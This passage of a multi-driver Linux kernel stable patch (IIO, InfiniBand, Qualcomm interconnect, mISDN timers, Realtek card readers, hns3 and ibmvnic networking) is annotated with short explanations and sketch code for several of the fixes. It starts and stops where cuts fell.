+ 		mixer_vgate = (2389 * vcm / 1000000 + 8100) / 100;
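regulator_get_voltage() returns microvolts on success or a negative errno, so the result must land in a signed int and be checked before it feeds any arithmetic; storing it in an unsigned variable, as the old admv1013 code did, silently turns -EINVAL into a huge voltage. A minimal sketch of the corrected shape:

#include <linux/regulator/consumer.h>

static int example_read_vcm(struct regulator *reg)
{
	int uv = regulator_get_voltage(reg);	/* microvolts or -errno */

	if (uv < 0)
		return uv;	/* propagate; don't treat the errno as 0 V */

	/* uv is now safe to compare against thresholds */
	return 0;
}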
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index 151ff39933548..f3f8392623a46 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -1916,7 +1916,7 @@ static const struct iio_buffer_setup_ops noop_ring_setup_ops;
+ int __iio_device_register(struct iio_dev *indio_dev, struct module *this_mod)
+ {
+ 	struct iio_dev_opaque *iio_dev_opaque = to_iio_dev_opaque(indio_dev);
+-	struct fwnode_handle *fwnode;
++	struct fwnode_handle *fwnode = NULL;
+ 	int ret;
+ 
+ 	if (!indio_dev->info)
+@@ -1927,7 +1927,8 @@ int __iio_device_register(struct iio_dev *indio_dev, struct module *this_mod)
+ 	/* If the calling driver did not initialize firmware node, do it here */
+ 	if (dev_fwnode(&indio_dev->dev))
+ 		fwnode = dev_fwnode(&indio_dev->dev);
+-	else
++	/* The default dummy IIO device has no parent */
++	else if (indio_dev->dev.parent)
+ 		fwnode = dev_fwnode(indio_dev->dev.parent);
+ 	device_set_node(&indio_dev->dev, fwnode);
+ 
+diff --git a/drivers/infiniband/core/umem.c b/drivers/infiniband/core/umem.c
+index 86d479772fbc6..957634eceba8f 100644
+--- a/drivers/infiniband/core/umem.c
++++ b/drivers/infiniband/core/umem.c
+@@ -85,6 +85,8 @@ unsigned long ib_umem_find_best_pgsz(struct ib_umem *umem,
+ 	dma_addr_t mask;
+ 	int i;
+ 
++	umem->iova = va = virt;
++
+ 	if (umem->is_odp) {
+ 		unsigned int page_size = BIT(to_ib_umem_odp(umem)->page_shift);
+ 
+@@ -100,7 +102,6 @@ unsigned long ib_umem_find_best_pgsz(struct ib_umem *umem,
+ 	 */
+ 	pgsz_bitmap &= GENMASK(BITS_PER_LONG - 1, PAGE_SHIFT);
+ 
+-	umem->iova = va = virt;
+ 	/* The best result is the smallest page size that results in the minimum
+ 	 * number of required pages. Compute the largest page size that could
+ 	 * work based on VA address bits that don't change.
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index 90b672feed83d..194cac40da653 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -12307,6 +12307,7 @@ static void free_cntrs(struct hfi1_devdata *dd)
+ 
+ 	if (dd->synth_stats_timer.function)
+ 		del_timer_sync(&dd->synth_stats_timer);
++	cancel_work_sync(&dd->update_cntr_work);
+ 	ppd = (struct hfi1_pportdata *)(dd + 1);
+ 	for (i = 0; i < dd->num_pports; i++, ppd++) {
+ 		kfree(ppd->cntrs);
+diff --git a/drivers/interconnect/qcom/bcm-voter.c b/drivers/interconnect/qcom/bcm-voter.c
+index 8f385f9c2dd38..d5f2a6b5376bd 100644
+--- a/drivers/interconnect/qcom/bcm-voter.c
++++ b/drivers/interconnect/qcom/bcm-voter.c
+@@ -83,6 +83,11 @@ static void bcm_aggregate(struct qcom_icc_bcm *bcm)
+ 
+ 		temp = agg_peak[bucket] * bcm->vote_scale;
+ 		bcm->vote_y[bucket] = bcm_div(temp, bcm->aux_data.unit);
++
++		if (bcm->enable_mask && (bcm->vote_x[bucket] || bcm->vote_y[bucket])) {
++			bcm->vote_x[bucket] = 0;
++			bcm->vote_y[bucket] = bcm->enable_mask;
++		}
+ 	}
+ 
+ 	if (bcm->keepalive && bcm->vote_x[QCOM_ICC_BUCKET_AMC] == 0 &&
+diff --git a/drivers/interconnect/qcom/icc-rpmh.h b/drivers/interconnect/qcom/icc-rpmh.h
+index 04391c1ba465c..7843d8864d6ba 100644
+--- a/drivers/interconnect/qcom/icc-rpmh.h
++++ b/drivers/interconnect/qcom/icc-rpmh.h
+@@ -81,6 +81,7 @@ struct qcom_icc_node {
+  * @vote_x: aggregated threshold values, represents sum_bw when @type is bw bcm
+  * @vote_y: aggregated threshold values, represents peak_bw when @type is bw bcm
+  * @vote_scale: scaling factor for vote_x and vote_y
++ * @enable_mask: optional mask to send as vote instead of vote_x/vote_y
+  * @dirty: flag used to indicate whether the bcm needs to be committed
+  * @keepalive: flag used to indicate whether a keepalive is required
+  * @aux_data: auxiliary data used when calculating threshold values and
+@@ -97,6 +98,7 @@ struct qcom_icc_bcm {
+ 	u64 vote_x[QCOM_ICC_NUM_BUCKETS];
+ 	u64 vote_y[QCOM_ICC_NUM_BUCKETS];
+ 	u64 vote_scale;
++	u32 enable_mask;
+ 	bool dirty;
+ 	bool keepalive;
+ 	struct bcm_db aux_data;
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index 2d7a8e7b85ec2..e64c214b40209 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1337,6 +1337,7 @@ static struct qcom_icc_node qns_mem_noc_sf_disp = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = 0x8,
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi },
+ };
+@@ -1349,6 +1350,7 @@ static struct qcom_icc_bcm bcm_ce0 = {
+ 
+ static struct qcom_icc_bcm bcm_cn0 = {
+ 	.name = "CN0",
++	.enable_mask = 0x1,
+ 	.keepalive = true,
+ 	.num_nodes = 55,
+ 	.nodes = { &qnm_gemnoc_cnoc, &qnm_gemnoc_pcie,
+@@ -1383,6 +1385,7 @@ static struct qcom_icc_bcm bcm_cn0 = {
+ 
+ static struct qcom_icc_bcm bcm_co0 = {
+ 	.name = "CO0",
++	.enable_mask = 0x1,
+ 	.num_nodes = 2,
+ 	.nodes = { &qxm_nsp, &qns_nsp_gemnoc },
+ };
+@@ -1403,6 +1406,7 @@ static struct qcom_icc_bcm bcm_mm0 = {
+ 
+ static struct qcom_icc_bcm bcm_mm1 = {
+ 	.name = "MM1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 12,
+ 	.nodes = { &qnm_camnoc_hf, &qnm_camnoc_icp,
+ 		   &qnm_camnoc_sf, &qnm_mdp,
+@@ -1445,6 +1449,7 @@ static struct qcom_icc_bcm bcm_sh0 = {
+ 
+ static struct qcom_icc_bcm bcm_sh1 = {
+ 	.name = "SH1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 7,
+ 	.nodes = { &alm_gpu_tcu, &alm_sys_tcu,
+ 		   &qnm_nsp_gemnoc, &qnm_pcie,
+@@ -1461,6 +1466,7 @@ static struct qcom_icc_bcm bcm_sn0 = {
+ 
+ static struct qcom_icc_bcm bcm_sn1 = {
+ 	.name = "SN1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 4,
+ 	.nodes = { &qhm_gic, &qxm_pimem,
+ 		   &xm_gic, &qns_gemnoc_gc },
+@@ -1492,6 +1498,7 @@ static struct qcom_icc_bcm bcm_sn7 = {
+ 
+ static struct qcom_icc_bcm bcm_acv_disp = {
+ 	.name = "ACV",
++	.enable_mask = 0x1,
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi_disp },
+ };
+@@ -1510,6 +1517,7 @@ static struct qcom_icc_bcm bcm_mm0_disp = {
+ 
+ static struct qcom_icc_bcm bcm_mm1_disp = {
+ 	.name = "MM1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 3,
+ 	.nodes = { &qnm_mdp_disp, &qnm_rot_disp,
+ 		   &qns_mem_noc_sf_disp },
+@@ -1523,6 +1531,7 @@ static struct qcom_icc_bcm bcm_sh0_disp = {
+ 
+ static struct qcom_icc_bcm bcm_sh1_disp = {
+ 	.name = "SH1",
++	.enable_mask = 0x1,
+ 	.num_nodes = 1,
+ 	.nodes = { &qnm_pcie_disp },
+ };
+diff --git a/drivers/isdn/mISDN/dsp.h b/drivers/isdn/mISDN/dsp.h
+index fa09d511a8eda..baf31258f5c90 100644
+--- a/drivers/isdn/mISDN/dsp.h
++++ b/drivers/isdn/mISDN/dsp.h
+@@ -247,7 +247,7 @@ extern void dsp_cmx_hardware(struct dsp_conf *conf, struct dsp *dsp);
+ extern int dsp_cmx_conf(struct dsp *dsp, u32 conf_id);
+ extern void dsp_cmx_receive(struct dsp *dsp, struct sk_buff *skb);
+ extern void dsp_cmx_hdlc(struct dsp *dsp, struct sk_buff *skb);
+-extern void dsp_cmx_send(void *arg);
++extern void dsp_cmx_send(struct timer_list *arg);
+ extern void dsp_cmx_transmit(struct dsp *dsp, struct sk_buff *skb);
+ extern int dsp_cmx_del_conf_member(struct dsp *dsp);
+ extern int dsp_cmx_del_conf(struct dsp_conf *conf);
+diff --git a/drivers/isdn/mISDN/dsp_cmx.c b/drivers/isdn/mISDN/dsp_cmx.c
+index 6d2088fbaf69c..1b73af5013976 100644
+--- a/drivers/isdn/mISDN/dsp_cmx.c
++++ b/drivers/isdn/mISDN/dsp_cmx.c
+@@ -1625,7 +1625,7 @@ static u16	dsp_count; /* last sample count */
+ static int	dsp_count_valid; /* if we have last sample count */
+ 
+ void
+-dsp_cmx_send(void *arg)
++dsp_cmx_send(struct timer_list *arg)
+ {
+ 	struct dsp_conf *conf;
+ 	struct dsp_conf_member *member;
+diff --git a/drivers/isdn/mISDN/dsp_core.c b/drivers/isdn/mISDN/dsp_core.c
+index 386084530c2f8..fae95f1666883 100644
+--- a/drivers/isdn/mISDN/dsp_core.c
++++ b/drivers/isdn/mISDN/dsp_core.c
+@@ -1195,7 +1195,7 @@ static int __init dsp_init(void)
+ 	}
+ 
+ 	/* set sample timer */
+-	timer_setup(&dsp_spl_tl, (void *)dsp_cmx_send, 0);
++	timer_setup(&dsp_spl_tl, dsp_cmx_send, 0);
+ 	dsp_spl_tl.expires = jiffies + dsp_tics;
+ 	dsp_spl_jiffies = dsp_spl_tl.expires;
+ 	add_timer(&dsp_spl_tl);
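This converts dsp_cmx_send() to the modern timer callback signature, which lets dsp_init() drop the function-pointer cast that was hiding the mismatch. The canonical timer_setup()/from_timer() pattern, as a standalone sketch (my_state and its fields are hypothetical):

#include <linux/timer.h>
#include <linux/jiffies.h>

struct my_state {
	struct timer_list tick;
	unsigned long period;	/* in jiffies */
};

static void my_tick_fn(struct timer_list *t)
{
	/* from_timer() recovers the enclosing struct from the timer,
	 * replacing the old void *data cookie.
	 */
	struct my_state *st = from_timer(st, t, tick);

	/* ... periodic work ... */

	mod_timer(&st->tick, jiffies + st->period);
}

static void my_start(struct my_state *st)
{
	timer_setup(&st->tick, my_tick_fn, 0);
	st->tick.expires = jiffies + st->period;
	add_timer(&st->tick);
}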
+diff --git a/drivers/misc/cardreader/rts5227.c b/drivers/misc/cardreader/rts5227.c
+index d676cf63a9669..3dae5e3a16976 100644
+--- a/drivers/misc/cardreader/rts5227.c
++++ b/drivers/misc/cardreader/rts5227.c
+@@ -195,7 +195,7 @@ static int rts5227_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
+-	if (option->force_clkreq_0)
++	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
+ 		rtsx_pci_add_cmd(pcr, WRITE_REG_CMD, PETXCFG,
+ 				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5228.c b/drivers/misc/cardreader/rts5228.c
+index cfebad51d1d80..f4ab09439da70 100644
+--- a/drivers/misc/cardreader/rts5228.c
++++ b/drivers/misc/cardreader/rts5228.c
+@@ -435,17 +435,10 @@ static void rts5228_init_from_cfg(struct rtsx_pcr *pcr)
+ 			option->ltr_enabled = false;
+ 		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+ }
+ 
+ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ {
+-	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5228_AUTOLOAD_CFG1,
+ 			CD_RESUME_EN_MASK, CD_RESUME_EN_MASK);
+@@ -476,17 +469,6 @@ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
+-	/*
+-	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+-	 * to drive low, and we forcibly request clock.
+-	 */
+-	if (option->force_clkreq_0)
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+-	else
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rts5249.c b/drivers/misc/cardreader/rts5249.c
+index 91d240dd68faa..47ab72a43256b 100644
+--- a/drivers/misc/cardreader/rts5249.c
++++ b/drivers/misc/cardreader/rts5249.c
+@@ -327,12 +327,11 @@ static int rts5249_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
+-
+ 	/*
+ 	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+ 	 * to drive low, and we forcibly request clock.
+ 	 */
+-	if (option->force_clkreq_0)
++	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
+ 		rtsx_pci_write_register(pcr, PETXCFG,
+ 			FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5260.c b/drivers/misc/cardreader/rts5260.c
+index 9b42b20a3e5ae..79b18f6f73a8a 100644
+--- a/drivers/misc/cardreader/rts5260.c
++++ b/drivers/misc/cardreader/rts5260.c
+@@ -517,17 +517,10 @@ static void rts5260_init_from_cfg(struct rtsx_pcr *pcr)
+ 			option->ltr_enabled = false;
+ 		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+ }
+ 
+ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ {
+-	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	/* Set mcu_cnt to 7 to ensure data can be sampled properly */
+ 	rtsx_pci_write_register(pcr, 0xFC03, 0x7F, 0x07);
+@@ -546,17 +539,6 @@ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ 
+ 	rts5260_init_hw(pcr);
+ 
+-	/*
+-	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+-	 * to drive low, and we forcibly request clock.
+-	 */
+-	if (option->force_clkreq_0)
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+-	else
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-
+ 	rtsx_pci_write_register(pcr, pcr->reg_pm_ctrl3, 0x10, 0x00);
+ 
+ 	return 0;
+diff --git a/drivers/misc/cardreader/rts5261.c b/drivers/misc/cardreader/rts5261.c
+index b1e76030cafda..94af6bf8a25a6 100644
+--- a/drivers/misc/cardreader/rts5261.c
++++ b/drivers/misc/cardreader/rts5261.c
+@@ -498,17 +498,10 @@ static void rts5261_init_from_cfg(struct rtsx_pcr *pcr)
+ 			option->ltr_enabled = false;
+ 		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+ }
+ 
+ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ {
+-	struct rtsx_cr_option *option = &pcr->option;
+ 	u32 val;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5261_AUTOLOAD_CFG1,
+@@ -554,17 +547,6 @@ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
+-	/*
+-	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+-	 * to drive low, and we forcibly request clock.
+-	 */
+-	if (option->force_clkreq_0)
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+-	else
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rtsx_pcr.c b/drivers/misc/cardreader/rtsx_pcr.c
+index 32b7783e9d4fa..a3f4b52bb159f 100644
+--- a/drivers/misc/cardreader/rtsx_pcr.c
++++ b/drivers/misc/cardreader/rtsx_pcr.c
+@@ -1326,8 +1326,11 @@ static int rtsx_pci_init_hw(struct rtsx_pcr *pcr)
+ 			return err;
+ 	}
+ 
+-	if (pcr->aspm_mode == ASPM_MODE_REG)
++	if (pcr->aspm_mode == ASPM_MODE_REG) {
+ 		rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0x30, 0x30);
++		rtsx_pci_write_register(pcr, PETXCFG,
++				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++	}
+ 
+ 	/* No CD interrupt if probing driver with card inserted.
+ 	 * So we need to initialize pcr->card_exist here.
+diff --git a/drivers/mmc/host/moxart-mmc.c b/drivers/mmc/host/moxart-mmc.c
+index 52ed30f2d9f4f..94e9a08bc90e1 100644
+--- a/drivers/mmc/host/moxart-mmc.c
++++ b/drivers/mmc/host/moxart-mmc.c
+@@ -338,13 +338,7 @@ static void moxart_transfer_pio(struct moxart_host *host)
+ 				return;
+ 			}
+ 			for (len = 0; len < remain && len < host->fifo_width;) {
+-				/* SCR data must be read in big endian. */
+-				if (data->mrq->cmd->opcode == SD_APP_SEND_SCR)
+-					*sgp = ioread32be(host->base +
+-							  REG_DATA_WINDOW);
+-				else
+-					*sgp = ioread32(host->base +
+-							REG_DATA_WINDOW);
++				*sgp = ioread32(host->base + REG_DATA_WINDOW);
+ 				sgp++;
+ 				len += 4;
+ 			}
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 576370f89c755..7a3c7a74af04a 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -5839,7 +5839,9 @@ void bond_setup(struct net_device *bond_dev)
+ 
+ 	bond_dev->hw_features = BOND_VLAN_FEATURES |
+ 				NETIF_F_HW_VLAN_CTAG_RX |
+-				NETIF_F_HW_VLAN_CTAG_FILTER;
++				NETIF_F_HW_VLAN_CTAG_FILTER |
++				NETIF_F_HW_VLAN_STAG_RX |
++				NETIF_F_HW_VLAN_STAG_FILTER;
+ 
+ 	bond_dev->hw_features |= NETIF_F_GSO_ENCAP_ALL;
+ 	bond_dev->features |= bond_dev->hw_features;
+diff --git a/drivers/net/dsa/ocelot/felix.c b/drivers/net/dsa/ocelot/felix.c
+index 4faabc4364aa7..2d2c6f941272c 100644
+--- a/drivers/net/dsa/ocelot/felix.c
++++ b/drivers/net/dsa/ocelot/felix.c
+@@ -1606,8 +1606,10 @@ static void felix_teardown(struct dsa_switch *ds)
+ 	struct felix *felix = ocelot_to_felix(ocelot);
+ 	struct dsa_port *dp;
+ 
++	rtnl_lock();
+ 	if (felix->tag_proto_ops)
+ 		felix->tag_proto_ops->teardown(ds);
++	rtnl_unlock();
+ 
+ 	dsa_switch_for_each_available_port(dp, ds)
+ 		ocelot_deinit_port(ocelot, dp->index);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index f6ededec5a4fa..69d1549e63a98 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -458,9 +458,9 @@ static void hns3_dbg_fill_content(char *content, u16 len,
+ 		if (result) {
+ 			if (item_len < strlen(result[i]))
+ 				break;
+-			strscpy(pos, result[i], strlen(result[i]));
++			memcpy(pos, result[i], strlen(result[i]));
+ 		} else {
+-			strscpy(pos, items[i].name, strlen(items[i].name));
++			memcpy(pos, items[i].name, strlen(items[i].name));
+ 		}
+ 		pos += item_len;
+ 		len -= item_len;
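The hns3 debugfs tables are built from fixed-width, space-padded cells, and strscpy() is the wrong tool for that: strscpy(pos, s, strlen(s)) copies only strlen(s) - 1 characters and then writes a NUL terminator into the padded row, truncating the cell. memcpy() copies exactly strlen(s) bytes and leaves the surrounding padding alone. A tiny plain-C illustration:

#include <string.h>

/* content is pre-filled with spaces; each cell is item_len bytes wide. */
static void fill_cell(char *pos, const char *s)
{
	/* strscpy(pos, s, strlen(s)) would turn "NAME" into "NAM\0",
	 * planting a terminator in the middle of the padded line.
	 */
	memcpy(pos, s, strlen(s));	/* copies "NAME", no terminator */
}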
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 248f15dac86ba..61f833d61f583 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -5854,6 +5854,9 @@ void hns3_external_lb_prepare(struct net_device *ndev, bool if_running)
+ 	if (!if_running)
+ 		return;
+ 
++	if (test_and_set_bit(HNS3_NIC_STATE_DOWN, &priv->state))
++		return;
++
+ 	netif_carrier_off(ndev);
+ 	netif_tx_disable(ndev);
+ 
+@@ -5882,7 +5885,16 @@ void hns3_external_lb_restore(struct net_device *ndev, bool if_running)
+ 	if (!if_running)
+ 		return;
+ 
+-	hns3_nic_reset_all_ring(priv->ae_handle);
++	if (hns3_nic_resetting(ndev))
++		return;
++
++	if (!test_bit(HNS3_NIC_STATE_DOWN, &priv->state))
++		return;
++
++	if (hns3_nic_reset_all_ring(priv->ae_handle))
++		return;
++
++	clear_bit(HNS3_NIC_STATE_DOWN, &priv->state);
+ 
+ 	for (i = 0; i < priv->vector_num; i++)
+ 		hns3_vector_enable(&priv->tqp_vector[i]);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 726062e512939..5cb8f1818e51c 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -110,9 +110,9 @@ static void hclge_dbg_fill_content(char *content, u16 len,
+ 		if (result) {
+ 			if (item_len < strlen(result[i]))
+ 				break;
+-			strscpy(pos, result[i], strlen(result[i]));
++			memcpy(pos, result[i], strlen(result[i]));
+ 		} else {
+-			strscpy(pos, items[i].name, strlen(items[i].name));
++			memcpy(pos, items[i].name, strlen(items[i].name));
+ 		}
+ 		pos += item_len;
+ 		len -= item_len;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 50e956d6c3b25..6af2273f227c2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -72,6 +72,8 @@ static void hclge_restore_hw_table(struct hclge_dev *hdev);
+ static void hclge_sync_promisc_mode(struct hclge_dev *hdev);
+ static void hclge_sync_fd_table(struct hclge_dev *hdev);
+ static void hclge_update_fec_stats(struct hclge_dev *hdev);
++static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret,
++				      int wait_cnt);
+ 
+ static struct hnae3_ae_algo ae_algo;
+ 
+@@ -7567,6 +7569,8 @@ static void hclge_enable_fd(struct hnae3_handle *handle, bool enable)
+ 
+ static void hclge_cfg_mac_mode(struct hclge_dev *hdev, bool enable)
+ {
++#define HCLGE_LINK_STATUS_WAIT_CNT  3
++
+ 	struct hclge_desc desc;
+ 	struct hclge_config_mac_mode_cmd *req =
+ 		(struct hclge_config_mac_mode_cmd *)desc.data;
+@@ -7591,9 +7595,15 @@ static void hclge_cfg_mac_mode(struct hclge_dev *hdev, bool enable)
+ 	req->txrx_pad_fcs_loop_en = cpu_to_le32(loop_en);
+ 
+ 	ret = hclge_cmd_send(&hdev->hw, &desc, 1);
+-	if (ret)
++	if (ret) {
+ 		dev_err(&hdev->pdev->dev,
+ 			"mac enable fail, ret =%d.\n", ret);
++		return;
++	}
++
++	if (!enable)
++		hclge_mac_link_status_wait(hdev, HCLGE_LINK_STATUS_DOWN,
++					   HCLGE_LINK_STATUS_WAIT_CNT);
+ }
+ 
+ static int hclge_config_switch_param(struct hclge_dev *hdev, int vfid,
+@@ -7656,10 +7666,9 @@ static void hclge_phy_link_status_wait(struct hclge_dev *hdev,
+ 	} while (++i < HCLGE_PHY_LINK_STATUS_NUM);
+ }
+ 
+-static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret)
++static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret,
++				      int wait_cnt)
+ {
+-#define HCLGE_MAC_LINK_STATUS_NUM  100
+-
+ 	int link_status;
+ 	int i = 0;
+ 	int ret;
+@@ -7672,13 +7681,15 @@ static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret)
+ 			return 0;
+ 
+ 		msleep(HCLGE_LINK_STATUS_MS);
+-	} while (++i < HCLGE_MAC_LINK_STATUS_NUM);
++	} while (++i < wait_cnt);
+ 	return -EBUSY;
+ }
+ 
+ static int hclge_mac_phy_link_status_wait(struct hclge_dev *hdev, bool en,
+ 					  bool is_phy)
+ {
++#define HCLGE_MAC_LINK_STATUS_NUM  100
++
+ 	int link_ret;
+ 
+ 	link_ret = en ? HCLGE_LINK_STATUS_UP : HCLGE_LINK_STATUS_DOWN;
+@@ -7686,7 +7697,8 @@ static int hclge_mac_phy_link_status_wait(struct hclge_dev *hdev, bool en,
+ 	if (is_phy)
+ 		hclge_phy_link_status_wait(hdev, link_ret);
+ 
+-	return hclge_mac_link_status_wait(hdev, link_ret);
++	return hclge_mac_link_status_wait(hdev, link_ret,
++					  HCLGE_MAC_LINK_STATUS_NUM);
+ }
+ 
+ static int hclge_set_app_loopback(struct hclge_dev *hdev, bool en)
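The hclge change above makes the MAC-disable path wait for the link to actually report down, reusing the same bounded poll as the loopback code but with a caller-supplied retry count. The general shape, with hypothetical names (my_hw, my_read_link_up, MY_POLL_INTERVAL_MS):

#include <linux/delay.h>
#include <linux/errno.h>

#define MY_POLL_INTERVAL_MS	200	/* hypothetical */

struct my_hw;
bool my_read_link_up(struct my_hw *hw);	/* hypothetical status read */

static int my_wait_link_status(struct my_hw *hw, bool want_up, int max_tries)
{
	int i;

	for (i = 0; i < max_tries; i++) {
		if (my_read_link_up(hw) == want_up)
			return 0;
		msleep(MY_POLL_INTERVAL_MS);
	}

	return -EBUSY;	/* the status never reached the expected state */
}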
+diff --git a/drivers/net/ethernet/ibm/ibmvnic.c b/drivers/net/ethernet/ibm/ibmvnic.c
+index bc97f24b08270..157be4e9be4b7 100644
+--- a/drivers/net/ethernet/ibm/ibmvnic.c
++++ b/drivers/net/ethernet/ibm/ibmvnic.c
+@@ -96,6 +96,8 @@ static int pending_scrq(struct ibmvnic_adapter *,
+ static union sub_crq *ibmvnic_next_scrq(struct ibmvnic_adapter *,
+ 					struct ibmvnic_sub_crq_queue *);
+ static int ibmvnic_poll(struct napi_struct *napi, int data);
++static int reset_sub_crq_queues(struct ibmvnic_adapter *adapter);
++static inline void reinit_init_done(struct ibmvnic_adapter *adapter);
+ static void send_query_map(struct ibmvnic_adapter *adapter);
+ static int send_request_map(struct ibmvnic_adapter *, dma_addr_t, u32, u8);
+ static int send_request_unmap(struct ibmvnic_adapter *, u8);
+@@ -113,6 +115,7 @@ static void ibmvnic_tx_scrq_clean_buffer(struct ibmvnic_adapter *adapter,
+ static void free_long_term_buff(struct ibmvnic_adapter *adapter,
+ 				struct ibmvnic_long_term_buff *ltb);
+ static void ibmvnic_disable_irqs(struct ibmvnic_adapter *adapter);
++static void flush_reset_queue(struct ibmvnic_adapter *adapter);
+ 
+ struct ibmvnic_stat {
+ 	char name[ETH_GSTRING_LEN];
+@@ -1314,8 +1317,8 @@ static const char *adapter_state_to_string(enum vnic_state state)
+ 
+ static int ibmvnic_login(struct net_device *netdev)
+ {
++	unsigned long flags, timeout = msecs_to_jiffies(20000);
+ 	struct ibmvnic_adapter *adapter = netdev_priv(netdev);
+-	unsigned long timeout = msecs_to_jiffies(20000);
+ 	int retry_count = 0;
+ 	int retries = 10;
+ 	bool retry;
+@@ -1336,11 +1339,9 @@ static int ibmvnic_login(struct net_device *netdev)
+ 
